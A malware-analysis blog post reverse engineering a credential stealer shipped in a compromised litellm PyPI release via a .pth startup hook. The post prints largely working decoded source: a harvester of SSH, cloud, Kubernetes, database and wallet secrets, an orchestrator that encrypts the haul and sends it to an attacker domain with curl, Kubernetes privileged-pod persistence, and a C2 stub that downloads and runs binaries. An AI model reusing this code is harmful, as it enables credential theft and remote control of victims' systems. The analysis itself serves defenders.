Reverse Engineering the LiteLLM PyPI Supply Chain Credential Stealer
tl;dr
Malicious releases of the litellm PyPI package (version 1.82.8 confirmed in this analysis) shipped a .pth file that ran silently on every Python startup in the affected environment. No user interaction is required beyond a routine pip install. The payload is a credential stealer that hoovers up SSH keys, cloud IAM credentials, Kubernetes service-account tokens, and .env files. It encrypts the haul with a hybrid RSA/AES envelope and ships it to an attacker-controlled domain dressed up as legitimate LiteLLM infrastructure. It also installs a persistent systemd service that polls a remote endpoint for a second-stage binary, plus some interesting K8s / AWS persistence modules. This post is a full static teardown of the .pth file, its four embedded layers, and the tradecraft at each stage.
Background
Alex Birsan said it best:
Ever since I started learning how to code, I have been fascinated by the level of trust we put in a simple command like this one:
pip install package_name… When downloading and using a package from any of these sources, you are essentially trusting its publisher to run code on your machine. So can this blind trust be exploited by malicious actors?
LiteLLM is an open-source Python SDK that provides a unified interface across dozens of LLM providers (OpenAI, Anthropic, Google, Azure, and more). Its utility in agentic projects makes it precisely the kind of deeply embedded dependency supply-chain attackers hunt for: a package that developers pip install into agent frameworks and CI environments without a second thought.
Python’s packaging model creates a structural opening for this class of attack. A wheel (.whl) is a renamed zip archive. When pip install runs, it unpacks the wheel’s contents directly into the environment’s site-packages, with no compilation, no review gate, and no sandboxing. For projects that haven’t adopted Trusted Publishing (OIDC from CI to PyPI), the practical trust anchor is still the publisher’s PyPI account and any long-lived upload tokens. Compromise those credentials or a CI secret, and you can push a malicious wheel without ever touching the project’s public GitHub repository. The source repo looks clean. The live PyPI release carries a payload.
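Since a wheel is structurally just a zip, you can inspect one without ever installing it. A minimal sketch, building a toy wheel in memory to show the principle (the file names here are illustrative, not the actual malicious wheel's layout):

```python
import io
import zipfile

# Build a toy wheel in memory: structurally, a .whl is just a zip archive.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as whl:
    whl.writestr("litellm/__init__.py", "# package code\n")
    whl.writestr("litellm-1.82.8.dist-info/METADATA", "Name: litellm\n")
    # A .pth file at the archive root lands directly in site-packages on install.
    whl.writestr("litellm_init.pth", "import os  # would run at every interpreter startup\n")

# Listing names is enough to spot a suspicious .pth without executing anything.
with zipfile.ZipFile(io.BytesIO(buf.getvalue())) as whl:
    pth_files = [n for n in whl.namelist() if n.endswith(".pth")]
print(pth_files)  # ['litellm_init.pth']
```

The same namelist() check works on a real wheel downloaded with pip download rather than pip install.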
Developers who audit source code or follow commits would see nothing wrong. Package-level auditing is the defensive step that catches this, and almost nobody does it as part of their standard workflow.
The specifics of how, exactly, the compromised code found its way into the package are less important for this post. I vaguely understand that a maintainer of a related project was compromised for initial access, then the threat actor used that initial access to stage the malicious package update. I’ll leave that to the threat intel peeps because I’m more interested in the malware machinations.
Artifacts: versions, provenance, and safe handling
The version confirmed in this analysis is 1.82.8. That version number appears in the inspector.pypi.io URL I used to retrieve the wheel (see the next section). Check the official PyPI advisory and any maintainer disclosures for the full range of affected versions.
I understand that version 1.82.7 is also compromised, with the payload carried in proxy_server.py, but I’m leaving that one out of scope for now.
Do not pip install a suspected package to study it. The correct first tool for analyzing malicious Python packages is PyPI’s built-in file inspector. The inspector serves the raw contents of any wheel, including releases that have already been yanked from the index, without requiring you to download or execute anything locally. For each file in the wheel you can view the bytes in your browser or pull them with curl.
The SHA256 below is the hash of the raw .pth payload text as retrieved from the inspector link:
λ sha256sum payload.txt
71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238 payload.txt
Sourcing the sample
The package has already been removed from PyPI. Lucky for us, nothing is ever truly removed from the internet.
λ curl hxxps://inspector[.]pypi[.]io/project/litellm/1.82.8/packages/fd/78/2167536f8859e655b28adf09ee7f4cd876745a933ba2be26853557775412/litellm-1.82.8-py3-none-any.whl/litellm_init[.]pth > out.txt
Clean up the retrieved text and parse out the Python payload from the inspector response (the raw page wraps file bodies in HTML <code>…</code>, so strip those delimiters if your copy includes them):
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0I...[snip]...'))"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
This single line is the entire .pth payload. It starts with import, which satisfies the site module’s execution trigger (any .pth line beginning with import is exec’d at interpreter startup, but more on that in a moment). The rest is a self-contained launcher which spawns a fresh interpreter via Popen, feeds it a base64-decode-and-exec one-liner as the -c argument, and discards both stdout and stderr. The parent process returns immediately and the malicious child runs detached in the background with no visible output.
Pretty standard stuff.
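The launcher shape is easy to reproduce with a benign child. A sketch of the same detach-and-discard pattern (the marker file and one-liner are mine, purely for observability):

```python
import os
import subprocess
import sys
import tempfile
import time

marker = os.path.join(tempfile.mkdtemp(), "marker")

# Same launcher shape as the .pth: detach a child interpreter running a -c
# one-liner, with both output streams discarded. (The child here is benign.)
child_code = f"open({marker!r}, 'w').write('ran')"
subprocess.Popen(
    [sys.executable, "-c", child_code],
    stdout=subprocess.DEVNULL,
    stderr=subprocess.DEVNULL,
)

# The parent returns immediately; the child keeps running in the background.
for _ in range(50):  # poll briefly only so this sketch is self-contained
    if os.path.exists(marker):
        break
    time.sleep(0.1)
print(open(marker).read())  # ran
```

In the real payload there is no polling, of course: the parent simply exits and nothing in the foreground ever sees the child's existence.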
Before I unpack the base64 payload, though, it’s worth understanding exactly why this file extension makes the whole thing work.
.pth files: Python’s quietest footgun
If you’ve never run into .pth files before, well, I hadn’t either. In a normal Python install, files matching *.pth live under site-packages (and a few related directories). They’re path configuration hooks processed automatically when Python starts up and initializes the site module.
Roughly, the site module scans for .pth files in known site directories. For each line in each file:
- A line starting with # is a comment - ignored.
- A blank line - ignored.
- A line that starts with import followed by whitespace is treated specially: the entire line is executed as Python code. CPython does this from the site machinery when loading path hooks. Any code on such a line runs every time a new interpreter starts, before your script’s main runs, as long as that site-packages tree is on the path. This is the primary persistence primitive.
- Any other non-empty line is interpreted as a path string. If it exists, it gets appended to sys.path.
So a wheel that drops something like litellm_init.pth into site-packages doesn’t rely on anyone typing import litellm. As soon as users run any Python that loads that environment, the .pth hook fires.
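The per-line rules above can be modeled in a few lines. This is a simplified illustration of what site.addpackage does with each line, not the CPython source:

```python
def process_pth_line(line, paths):
    """Simplified model of how site.addpackage treats one .pth line."""
    if not line.strip() or line.startswith("#"):
        return                       # comment or blank: ignored
    if line.startswith(("import ", "import\t")):
        exec(line)                   # executed as code at interpreter startup
    else:
        paths.append(line.rstrip())  # otherwise treated as a path entry

collected = []
ran = []
for line in [
    "# just a comment",
    "",
    "import sys; ran.append('hook fired')",  # the persistence primitive
    "/opt/extra-packages",
]:
    process_pth_line(line, collected)

print(ran)        # ['hook fired']
print(collected)  # ['/opt/extra-packages']
```

The import line here appends to a list; in the malicious wheel, the same slot holds the Popen launcher.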
Full deobfuscation
Before we get heavy into analysis, let’s perform the full deobfuscation, which is really just decoding in this case. The payload is structured as a four-layer onion. Working from the outside in, I’ll refer to the layers as follows:
- Entrypoint - the .pth one-liner (shown above in Sourcing the sample). Its only job is to detach a child interpreter and bootstrap layer two.
- Orchestrator - the first base64-decoded script. Creates a temp workspace, runs the harvester as a subprocess, encrypts its output with a hybrid RSA/AES envelope, and exfiltrates.
- Harvester + persistence - the second base64-decoded script. The actual data-collection engine plus a Kubernetes cluster pivot and local systemd persistence.
- C2 stub - the innermost blob, installed as a systemd service. Sleeps, polls a remote URL, and executes whatever binary it points to.
The obfuscation is light work to reverse. It’s base64. There’s nothing more complex than a simple decode to unravel the inner layers.
Here’s every layer, fully decoded, with omissions and select defanging.
Layer 2: Orchestrator
Orchestrator — full decoded source
import subprocess
import tempfile
import os
import base64
import sys
PUB_KEY_CONTENT = """-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFA...[snip]
-----END PUBLIC KEY-----"""
B64_SCRIPT = "aW1wb3J0...[snip]"
def run():
with tempfile.TemporaryDirectory() as d:
collected = os.path.join(d, "c")
pk = os.path.join(d, "p")
sk = os.path.join(d, "session.key")
ef = os.path.join(d, "payload.enc")
ek = os.path.join(d, "session.key.enc")
bn = os.path.join(d, "tpcp.tar.gz")
try:
payload = base64.b64decode(B64_SCRIPT)
with open(collected, "wb") as f:
subprocess.run(
[sys.executable, "-"],
input=payload,
stdout=f,
stderr=subprocess.DEVNULL,
check=True
)
except Exception:
return
if not os.path.exists(collected) or os.path.getsize(collected) == 0:
return
with open(pk, "w") as f:
f.write(PUB_KEY_CONTENT)
try:
subprocess.run(["openssl", "rand", "-out", sk, "32"], check=True)
subprocess.run(["openssl", "enc", "-aes-256-cbc", "-in", collected, "-out", ef, "-pass", f"file:{sk}", "-pbkdf2"], check=True, stderr=subprocess.DEVNULL)
subprocess.run(["openssl", "pkeyutl", "-encrypt", "-pubin", "-inkey", pk, "-in", sk, "-out", ek, "-pkeyopt", "rsa_padding_mode:oaep"], check=True, stderr=subprocess.DEVNULL)
subprocess.run(["tar", "-czf", bn, "-C", d, "payload.enc", "session.key.enc"], check=True)
subprocess.run([
"curl", "-s", "-o", "/dev/null", "-w", "%{http_code}", "-X", "POST",
"hxxps://models[.]litellm[.]cloud/",
"-H", "Content-Type: application/octet-stream",
"-H", "X-Filename: tpcp.tar.gz",
"--data-binary", f"@{bn}"
], check=True, stderr=subprocess.DEVNULL)
except Exception:
pass
if __name__ == "__main__":
    run()
Layer 3: Harvester + Persistence
Harvester + persistence — full decoded source
import os,sys,stat,subprocess,glob
def emit(path):
try:
st=os.stat(path)
if not stat.S_ISREG(st.st_mode):return
with open(path,'rb') as fh:data=fh.read()
sys.stdout.buffer.write(('\n=== '+path+' ===\n').encode())
sys.stdout.buffer.write(data)
sys.stdout.buffer.write(b'\n')
except OSError:pass
def emit_glob(pattern):
for p in glob.glob(pattern,recursive=True):emit(p)
def run(cmd):
try:
out=subprocess.check_output(cmd,shell=True,stderr=subprocess.DEVNULL,timeout=10)
if out:
sys.stdout.buffer.write(('\n=== CMD: '+cmd+' ===\n').encode())
sys.stdout.buffer.write(out)
sys.stdout.buffer.write(b'\n')
except Exception:pass
def walk(roots,max_depth,match_fn):
for root in roots:
if not os.path.isdir(root):continue
for dirpath,dirs,files in os.walk(root,followlinks=False):
rel=os.path.relpath(dirpath,root)
depth=0 if rel=='.' else rel.count(os.sep)+1
if depth>=max_depth:dirs[:]=[];continue
for fn in files:
fp=os.path.join(dirpath,fn)
if match_fn(fp,fn):emit(fp)
homes=[]
try:
for e in os.scandir('/home'):
if e.is_dir():homes.append(e.path)
except OSError:pass
homes.append('/root')
all_roots=homes+['/opt','/srv','/var/www','/app','/data','/var/lib','/tmp']
run('hostname; pwd; whoami; uname -a; ip addr 2>/dev/null || ifconfig 2>/dev/null; ip route 2>/dev/null')
run('printenv')
for h in homes+['/root']:
for f in ['/.ssh/id_rsa','/.ssh/id_ed25519','/.ssh/id_ecdsa','/.ssh/id_dsa','/.ssh/authorized_keys','/.ssh/known_hosts','/.ssh/config']:
emit(h+f)
walk([h+'/.ssh'],2,lambda fp,fn:True)
walk(['/etc/ssh'],1,lambda fp,fn:fn.startswith('ssh_host') and fn.endswith('_key'))
for h in homes+['/root']:
for f in ['/.git-credentials','/.gitconfig']:emit(h+f)
for h in homes+['/root']:
emit(h+'/.aws/credentials')
emit(h+'/.aws/config')
for d in ['.','..','../..']:
for f in ['.env','.env.local','.env.production','.env.development','.env.staging','.env.test']:
emit(d+'/'+f)
emit('/app/.env')
emit('/etc/environment')
walk(all_roots,6,lambda fp,fn:fn in {'.env','.env.local','.env.production','.env.development','.env.staging'})
run('env | grep AWS_')
run('curl -s http://169.254.170.2${AWS_CONTAINER_CREDENTIALS_RELATIVE_URI} 2>/dev/null || true')
run('curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null || true')
for h in homes+['/root']:
emit(h+'/.kube/config')
emit('/etc/kubernetes/admin.conf')
emit('/etc/kubernetes/kubelet.conf')
emit('/etc/kubernetes/controller-manager.conf')
emit('/etc/kubernetes/scheduler.conf')
emit('/var/run/secrets/kubernetes.io/serviceaccount/token')
emit('/var/run/secrets/kubernetes.io/serviceaccount/ca.crt')
emit('/var/run/secrets/kubernetes.io/serviceaccount/namespace')
emit('/run/secrets/kubernetes.io/serviceaccount/token')
emit('/run/secrets/kubernetes.io/serviceaccount/ca.crt')
run('find /var/secrets /run/secrets -type f 2>/dev/null | xargs -I{} sh -c \'echo "=== {} ==="; cat "{}" 2>/dev/null\'')
run('env | grep -i kube; env | grep -i k8s')
run('kubectl get secrets --all-namespaces -o json 2>/dev/null || true')
for h in homes+['/root']:
walk([h+'/.config/gcloud'],4,lambda fp,fn:True)
emit('/root/.config/gcloud/application_default_credentials.json')
run('env | grep -i google; env | grep -i gcloud')
run('cat $GOOGLE_APPLICATION_CREDENTIALS 2>/dev/null || true')
for h in homes+['/root']:
walk([h+'/.azure'],3,lambda fp,fn:True)
run('env | grep -i azure')
for h in homes+['/root']:
emit(h+'/.docker/config.json')
emit('/kaniko/.docker/config.json')
emit('/root/.docker/config.json')
for h in homes+['/root']:
emit(h+'/.npmrc')
emit(h+'/.vault-token')
emit(h+'/.netrc')
emit(h+'/.lftp/rc')
emit(h+'/.msmtprc')
emit(h+'/.my.cnf')
emit(h+'/.pgpass')
emit(h+'/.mongorc.js')
for hist in ['/.bash_history','/.zsh_history','/.sh_history','/.mysql_history','/.psql_history','/.rediscli_history']:
emit(h+hist)
emit('/var/lib/postgresql/.pgpass')
emit('/etc/mysql/my.cnf')
emit('/etc/redis/redis.conf')
emit('/etc/postfix/sasl_passwd')
emit('/etc/msmtprc')
emit('/etc/ldap/ldap.conf')
emit('/etc/openldap/ldap.conf')
emit('/etc/ldap.conf')
emit('/etc/ldap/slapd.conf')
emit('/etc/openldap/slapd.conf')
run('env | grep -iE "(DATABASE|DB_|MYSQL|POSTGRES|MONGO|REDIS|VAULT)"')
walk(['/etc/wireguard'],1,lambda fp,fn:fn.endswith('.conf'))
run('wg showconf all 2>/dev/null || true')
for h in homes+['/root']:
walk([h+'/.helm'],3,lambda fp,fn:True)
for ci in ['terraform.tfvars','.gitlab-ci.yml','.travis.yml','Jenkinsfile','.drone.yml','Anchor.toml','ansible.cfg']:
emit(ci)
walk(all_roots,4,lambda fp,fn:fn.endswith('.tfvars'))
walk(all_roots,4,lambda fp,fn:fn=='terraform.tfstate')
walk(['/etc/ssl/private'],1,lambda fp,fn:fn.endswith('.key'))
walk(['/etc/letsencrypt'],4,lambda fp,fn:fn.endswith('.pem'))
walk(all_roots,5,lambda fp,fn:os.path.splitext(fn)[1] in {'.pem','.key','.p12','.pfx'})
run('grep -r "hooks.slack.com\|discord.com/api/webhooks" . 2>/dev/null | head -20')
run('grep -rE "api[_-]?key|apikey|api[_-]?secret|access[_-]?token" . --include="*.env*" --include="*.json" --include="*.yml" --include="*.yaml" 2>/dev/null | head -50')
for h in homes+['/root']:
for coin in ['/.bitcoin/bitcoin.conf','/.litecoin/litecoin.conf','/.dogecoin/dogecoin.conf','/.zcash/zcash.conf','/.dashcore/dash.conf','/.ripple/rippled.cfg','/.bitmonero/bitmonero.conf']:
emit(h+coin)
walk([h+'/.bitcoin'],2,lambda fp,fn:fn.startswith('wallet') and fn.endswith('.dat'))
walk([h+'/.ethereum/keystore'],1,lambda fp,fn:True)
walk([h+'/.cardano'],3,lambda fp,fn:fn.endswith('.skey') or fn.endswith('.vkey'))
walk([h+'/.config/solana'],3,lambda fp,fn:True)
for sol in ['/validator-keypair.json','/vote-account-keypair.json','/authorized-withdrawer-keypair.json','/stake-account-keypair.json','/identity.json','/faucet-keypair.json']:
emit(h+sol)
walk([h+'/ledger'],3,lambda fp,fn:fn.endswith('.json') or fn.endswith('.bin'))
for sol_dir in ['/home/sol','/home/solana','/opt/solana','/solana','/app','/data']:
emit(sol_dir+'/validator-keypair.json')
walk(['.'],8,lambda fp,fn:fn in {'id.json','keypair.json'} or (fn.endswith('-keypair.json') and 'keypair' in fn) or (fn.startswith('wallet') and fn.endswith('.json')))
walk(['.anchor','./target/deploy','./keys'],5,lambda fp,fn:fn.endswith('.json'))
run('env | grep -i solana')
run('grep -r "rpcuser\|rpcpassword\|rpcauth" /root /home 2>/dev/null | head -50')
emit('/etc/passwd')
emit('/etc/shadow')
run('cat /var/log/auth.log 2>/dev/null | grep Accepted | tail -200')
run('cat /var/log/secure 2>/dev/null | grep Accepted | tail -200')
import urllib.request,urllib.error,json,hmac,hashlib,datetime,base64
def aws_req(method,service,region,path,payload,extra_headers,access_key,secret_key,token):
host=f'{service}.{region}.amazonaws.com'
t=datetime.datetime.utcnow()
amzdate=t.strftime('%Y%m%dT%H%M%SZ')
datestamp=t.strftime('%Y%m%d')
canonical_uri=path
canonical_querystring=''
canonical_headers=f'host:{host}\nx-amz-date:{amzdate}\n'
signed_headers='host;x-amz-date'
if token:
canonical_headers+=f'x-amz-security-token:{token}\n'
signed_headers+=';x-amz-security-token'
payload_hash=hashlib.sha256(payload.encode()).hexdigest()
canonical_request=f'{method}\n{canonical_uri}\n{canonical_querystring}\n{canonical_headers}\n{signed_headers}\n{payload_hash}'
credential_scope=f'{datestamp}/{region}/{service}/aws4_request'
string_to_sign=f'AWS4-HMAC-SHA256\n{amzdate}\n{credential_scope}\n'+hashlib.sha256(canonical_request.encode()).hexdigest()
def sign(key,msg):return hmac.new(key,msg.encode(),'sha256').digest()
signing_key=sign(sign(sign(sign(f'AWS4{secret_key}'.encode(),datestamp),region),service),'aws4_request')
signature=hmac.new(signing_key,string_to_sign.encode(),'sha256').hexdigest()
auth=f'AWS4-HMAC-SHA256 Credential={access_key}/{credential_scope}, SignedHeaders={signed_headers}, Signature={signature}'
hdrs={'x-amz-date':amzdate,'Authorization':auth,'x-amz-content-sha256':payload_hash}
if token:hdrs['x-amz-security-token']=token
hdrs.update(extra_headers)
req=urllib.request.Request(f'https://{host}{path}',data=payload.encode() if payload else None,headers=hdrs,method=method)
try:
with urllib.request.urlopen(req,timeout=10) as r:return json.loads(r.read())
except:return {}
AK=os.environ.get('AWS_ACCESS_KEY_ID','')
SK=os.environ.get('AWS_SECRET_ACCESS_KEY','')
ST=os.environ.get('AWS_SESSION_TOKEN','')
REG=os.environ.get('AWS_DEFAULT_REGION','us-east-1')
if AK and SK:
sys.stdout.buffer.write(b'\n=== AWS CREDENTIALS ===\n')
sys.stdout.buffer.write(f'AWS_ACCESS_KEY_ID={AK}\nAWS_SECRET_ACCESS_KEY={SK}\nAWS_SESSION_TOKEN={ST}\n'.encode())
try:
tkn_req=urllib.request.Request('http://169.254.169.254/latest/api/token',
headers={'X-aws-ec2-metadata-token-ttl-seconds':'21600'},method='PUT')
with urllib.request.urlopen(tkn_req,timeout=3) as r:
imds_token=r.read().decode()
cred_req=urllib.request.Request('http://169.254.169.254/latest/meta-data/iam/security-credentials/',
headers={'X-aws-ec2-metadata-token':imds_token})
with urllib.request.urlopen(cred_req,timeout=3) as r:
role_name=r.read().decode().strip()
cred_req2=urllib.request.Request(f'http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}',
headers={'X-aws-ec2-metadata-token':imds_token})
with urllib.request.urlopen(cred_req2,timeout=3) as r:
creds=json.loads(r.read())
sys.stdout.buffer.write(f'\n=== IMDS ROLE CREDENTIALS ===\n{json.dumps(creds,indent=2)}\n'.encode())
AK=creds.get('AccessKeyId',AK)
SK=creds.get('SecretAccessKey',SK)
ST=creds.get('Token',ST)
except:pass
sm=aws_req('POST','secretsmanager',REG,'/','Action=ListSecrets',
{'Content-Type':'application/x-amz-json-1.1','X-Amz-Target':'secretsmanager.ListSecrets'},AK,SK,ST)
if sm:
sys.stdout.buffer.write(f'\n=== AWS SECRETS MANAGER ===\n{json.dumps(sm,indent=2)}\n'.encode())
for s in sm.get('SecretList',sm.get('SecretList',[])):
sid=s.get('ARN','')
sv=aws_req('POST','secretsmanager',REG,'/','',
{'Content-Type':'application/x-amz-json-1.1','X-Amz-Target':'secretsmanager.GetSecretValue',
'Content-Type':'application/x-amz-json-1.1'},AK,SK,ST)
ssm=aws_req('POST','ssm',REG,'/','Action=DescribeParameters&Version=2014-11-06',
{'Content-Type':'application/x-www-form-urlencoded'},AK,SK,ST)
if ssm:
sys.stdout.buffer.write(f'\n=== AWS SSM PARAMETERS ===\n{json.dumps(ssm,indent=2)}\n'.encode())
SA_TOKEN_PATH='/var/run/secrets/kubernetes.io/serviceaccount/token'
K8S_CA='/var/run/secrets/kubernetes.io/serviceaccount/ca.crt'
if os.path.exists(SA_TOKEN_PATH):
with open(SA_TOKEN_PATH) as f:k8s_token=f.read().strip()
k8s_host=os.environ.get('KUBERNETES_SERVICE_HOST','kubernetes.default.svc')
k8s_port=os.environ.get('KUBERNETES_SERVICE_PORT','443')
api=f'https://{k8s_host}:{k8s_port}'
hdrs={'Authorization':f'Bearer {k8s_token}','Content-Type':'application/json'}
def k8s_get(path):
import ssl
ctx=ssl.create_default_context(cafile=K8S_CA) if os.path.exists(K8S_CA) else ssl._create_unverified_context()
req=urllib.request.Request(api+path,headers=hdrs)
try:
with urllib.request.urlopen(req,context=ctx,timeout=10) as r:return json.loads(r.read())
except:return {}
def k8s_post(path,data):
import ssl
ctx=ssl.create_default_context(cafile=K8S_CA) if os.path.exists(K8S_CA) else ssl._create_unverified_context()
req=urllib.request.Request(api+path,data=json.dumps(data).encode(),headers=hdrs,method='POST')
try:
with urllib.request.urlopen(req,context=ctx,timeout=30) as r:return json.loads(r.read())
except:return {}
secrets=k8s_get('/api/v1/secrets')
if secrets:
sys.stdout.buffer.write(f'\n=== K8S SECRETS ===\n{json.dumps(secrets,indent=2)}\n'.encode())
ns_data=k8s_get('/api/v1/namespaces')
for ns_item in ns_data.get('items',[]):
ns=ns_item.get('metadata',{}).get('name','')
ns_secrets=k8s_get(f'/api/v1/namespaces/{ns}/secrets')
if ns_secrets:
sys.stdout.buffer.write(f'\n=== K8S SECRETS ns={ns} ===\n{json.dumps(ns_secrets,indent=2)}\n'.encode())
PERSIST_B64='aW1wb3J0IHVybGxpYi5yZXF1...[snip]...'
nodes=k8s_get('/api/v1/nodes')
for node in nodes.get('items',[]):
node_name=node.get('metadata',{}).get('name','')
if not node_name:continue
drop_cmd=(
f'mkdir -p /host/root/.config/sysmon /host/root/.config/systemd/user && '
f'echo {PERSIST_B64}|base64 -d > /host/root/.config/sysmon/sysmon.py && '
f'chmod 700 /host/root/.config/sysmon/sysmon.py && '
f'PY=$(chroot /host which python3 2>/dev/null || chroot /host which python 2>/dev/null) && '
f'[ -n "$PY" ] && printf "[Unit]\\nDescription=System Telemetry Service\\nAfter=network.target\\n[Service]\\nType=simple\\nExecStart=$PY /root/.config/sysmon/sysmon.py\\nRestart=always\\nRestartSec=10\\n[Install]\\nWantedBy=multi-user.target\\n" > /host/root/.config/systemd/user/sysmon.service && '
f'chroot /host systemctl --user daemon-reload 2>/dev/null; '
f'chroot /host systemctl enable --now sysmon.service 2>/dev/null || true'
)
pod_manifest={
'apiVersion':'v1','kind':'Pod',
'metadata':{'name':f'node-setup-{node_name[:35]}','namespace':'kube-system'},
'spec':{
'nodeName':node_name,
'hostPID':True,'hostNetwork':True,
'tolerations':[{'operator':'Exists'}],
'containers':[{
'name':'setup',
'image':'alpine:latest',
'command':['sh','-c',drop_cmd],
'securityContext':{'privileged':True},
'volumeMounts':[{'name':'host','mountPath':'/host'}]
}],
'volumes':[{'name':'host','hostPath':{'path':'/'}}],
'restartPolicy':'Never'
}
}
k8s_post('/api/v1/namespaces/kube-system/pods',pod_manifest)
home=os.path.expanduser('~')
script_dir=os.path.join(home,'.config','sysmon')
script_path=os.path.join(script_dir,'sysmon.py')
unit_dir=os.path.join(home,'.config','systemd','user')
unit_path=os.path.join(unit_dir,'sysmon.service')
if not os.path.exists(script_path):
os.makedirs(script_dir,exist_ok=True)
os.makedirs(unit_dir,exist_ok=True)
try:
with open(script_path,'wb') as f:f.write(base64.b64decode(PERSIST_B64))
os.chmod(script_path,0o700)
import shutil
py=shutil.which('python3') or shutil.which('python')
if py:
unit=f'[Unit]\nDescription=System Telemetry Service\nAfter=network.target\nStartLimitIntervalSec=0\n\n[Service]\nType=simple\nExecStart={py} {script_path}\nRestart=always\nRestartSec=10\nKillMode=process\nStandardOutput=null\nStandardError=null\n\n[Install]\nWantedBy=multi-user.target\n'
with open(unit_path,'w') as f:f.write(unit)
subprocess.run(['systemctl','--user','daemon-reload'],capture_output=True,timeout=5)
subprocess.run(['systemctl','--user','enable','--now','sysmon.service'],capture_output=True,timeout=5)
    except:pass
Layer 4: C2 Stub
C2 stub — full decoded source
import urllib.request
import os
import subprocess
import time
C_URL = "hxxps://checkmarx[.]zone/raw"
TARGET = "/tmp/pglog"
STATE = "/tmp/.pg_state"
def g():
try:
req = urllib.request.Request(C_URL, headers={'User-Agent': 'Mozilla/5.0'})
with urllib.request.urlopen(req, timeout=10) as r:
link = r.read().decode('utf-8').strip()
return link if link.startswith("http") else None
except:
return None
def e(l):
try:
urllib.request.urlretrieve(l, TARGET)
os.chmod(TARGET, 0o755)
subprocess.Popen([TARGET], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, start_new_session=True)
with open(STATE, "w") as f:
f.write(l)
except:
pass
if __name__ == "__main__":
time.sleep(300)
while True:
l = g()
prev = ""
if os.path.exists(STATE):
try:
with open(STATE, "r") as f:
prev = f.read().strip()
except:
pass
if l and l != prev and "youtube.com" not in l:
e(l)
        time.sleep(3000)
Observed Tradecraft
With every layer peeled and the overall structure mapped, let’s call out some of the observed tradecraft in play.
.pth Startup Hijacking
The .pth extension is a path configuration hook, but any line starting with import gets exec’d by the site module at interpreter startup. The attacker exploits this by shipping litellm_init.pth inside the wheel. When pip install unpacks the wheel, the file lands in site-packages. From that moment on, every single Python invocation in that environment, from random scripts to a Jupyter notebook to you just running python -c "print('hello')", silently fires the hook before your code even begins.
The .pth line itself is a one-liner from Sourcing the sample:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0I...[snip]...'))"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
Both stdout and stderr are sent to DEVNULL. The parent process returns immediately. No traceback, no output, no indication that anything happened. Users who aren’t actively monitoring process trees would never notice.
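This mechanism also points at the cheapest detection: enumerate the .pth files in your site directories and flag any line that starts with import. A defensive sketch (expect benign hits from setuptools shims and editable installs; the goal is a short, reviewable list, not a verdict):

```python
import glob
import os
import site

def suspicious_pth_lines(directories=None):
    """List (.pth path, line number, line) for lines that execute code at startup."""
    if directories is None:
        directories = site.getsitepackages() + [site.getusersitepackages()]
    findings = []
    for d in directories:
        for pth in glob.glob(os.path.join(d, "*.pth")):
            with open(pth, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    if line.startswith("import "):
                        findings.append((pth, lineno, line.strip()))
    return findings

for path, lineno, line in suspicious_pth_lines():
    print(f"{path}:{lineno}: {line[:80]}")
```

Running this in the compromised environment would have surfaced litellm_init.pth and its Popen one-liner immediately.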
Nested Base64 with Stdin Execution
The payload is structured as three nested base64 layers (four if you count the .pth entrypoint itself). Each decoded layer reveals the next script. That’s the whole obfuscation model. Base64 isn’t encryption, despite what the movies will tell you, and it won’t survive any serious automated scanning, but it doesn’t need to. The aim is to slip past naive static checks, plain-text greps for suspicious strings, and it clears that bar easily.
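Peeling this kind of onion mechanizes nicely: decode, find the next blob, repeat, all without executing anything. A toy sketch with a harmless three-layer payload (the regex and the wrapper format are illustrative; the real sample's layers each carried more code around their embedded blob):

```python
import base64
import re

def build_layers(innermost, n):
    """Wrap a script in n layers of exec(base64.b64decode(...))."""
    script = innermost
    for _ in range(n):
        b64 = base64.b64encode(script.encode()).decode()
        script = f"import base64; exec(base64.b64decode('{b64}'))"
    return script

def peel(script):
    """Statically unwrap base64 layers without executing anything."""
    layers = [script]
    pat = re.compile(r"b64decode\('([A-Za-z0-9+/=]+)'\)")
    while (m := pat.search(layers[-1])):
        layers.append(base64.b64decode(m.group(1)).decode())
    return layers

layers = peel(build_layers("print('innermost payload')", 3))
print(len(layers))  # 4: the entrypoint plus three decoded layers
print(layers[-1])   # print('innermost payload')
```

This static peel is exactly how the full decoded sources in this post were produced, just with the [snip]'d blobs in place of the toy one.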
The more interesting tradecraft is in how the decoded scripts are executed. The orchestrator doesn’t write a .py file to disk. Instead:
try:
payload = base64.b64decode(B64_SCRIPT)
with open(collected, "wb") as f:
subprocess.run(
[sys.executable, "-"],
input=payload,
stdout=f,
stderr=subprocess.DEVNULL,
check=True
)
except Exception:
        return
It calls subprocess.run([sys.executable, "-"], input=payload, ...), feeding the decoded script on stdin. The - argument tells the interpreter to read source from standard input. The harvester’s output goes to stdout, which the parent captures into a temp file. This avoids leaving a named script in the wheel or in site-packages. The only file artifacts are the temp directory contents during the brief encryption window, and those get cleaned up when the TemporaryDirectory context manager exits.
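The stdin trick is trivial to reproduce with a benign payload. A sketch of the same shape, with a stand-in script in place of the harvester:

```python
import subprocess
import sys

# A benign stand-in for the decoded harvester: it just writes to stdout.
payload = b"import sys\nsys.stdout.write('collected data')\n"

# Run a fresh interpreter with '-' so it reads its source from stdin,
# exactly as the orchestrator does; capture stdout as the "collected" blob.
proc = subprocess.run(
    [sys.executable, "-"],
    input=payload,
    capture_output=True,
    check=True,
)
print(proc.stdout.decode())  # collected data
```

Nothing script-shaped ever touches disk; from the filesystem's point of view only the captured output exists.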
Across all layers, failures are swallowed with bare except: pass blocks, subprocess calls use short timeouts where applicable, and noisy channels go to DEVNULL. This really just removes visibility on the compromised host so there are no tracebacks in logs, no error messages, and no indication of failure.
Hybrid Cryptographic Exfiltration
Once the harvester finishes, the orchestrator builds a proper hybrid cryptosystem by shelling out to openssl:
subprocess.run(["openssl", "rand", "-out", sk, "32"], check=True)
